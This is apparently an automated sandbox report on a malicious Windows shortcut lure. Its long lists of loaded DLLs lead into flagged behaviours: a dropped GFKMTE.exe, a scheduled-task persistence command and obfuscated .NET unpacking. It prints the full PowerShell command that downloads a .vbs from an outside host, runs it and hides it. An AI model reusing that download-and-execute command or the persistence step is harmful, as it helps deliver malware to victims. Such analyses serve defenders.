                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: TRANSFERENCIA COMPROBANTES.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1442529638.000001BD45949000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: *n.pdbzj4 source: powershell.exe, 00000001.00000002.1436897425.000001BD455E2000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack, DllHandler.cs.Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
                        Source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack, DllHandler.cs.Net Code: DllNodeHandler
                        Source: 21.2.GFKMTE.exe.26a0000.0.raw.unpack, -Module-.cs.Net Code: _202C_200E_202D_200D_200B_202E_206A_206A_200F_202C_206F_206C_202D_202A_206F_200D_200F_206E_202D_206E_202C_206C_200F_202A_206F_202D_200B_200E_202E_202C_202E_200E_206E_206F_202C_206B_202D_200C_202D_200F_202E System.Reflection.Assembly.Load(byte[])
                        Source: 25.2.GFKMTE.exe.29ba2dc.0.raw.unpack, DllHandler.cs.Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
                        Source: 25.2.GFKMTE.exe.29ba2dc.0.raw.unpack, DllHandler.cs.Net Code: DllNodeHandler
                        Suspicious powershell command line found
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAACB48161 push ebx; ret 1_2_00007FFAACB4816A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAACC10D6C push eax; ret 1_2_00007FFAACC10D6D
                        Source: cfdhxdzhtfxgh[1].exe.11.drStatic PE information: section name: .text entropy: 7.798035539555323
                        Source: GFKMTE.exe.11.drStatic PE information: section name: .text entropy: 7.798035539555323
                        Source: GFKMTE.exe.22.drStatic PE information: section name: .text entropy: 7.798035539555323

                        Persistence and Installation Behavior

                        barindex
                        Windows shortcut file (LNK) starts blacklisted processes
                        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Tries to download and execute files (via powershell)
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeFile created: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exeJump to dropped file
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exeJump to dropped file

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
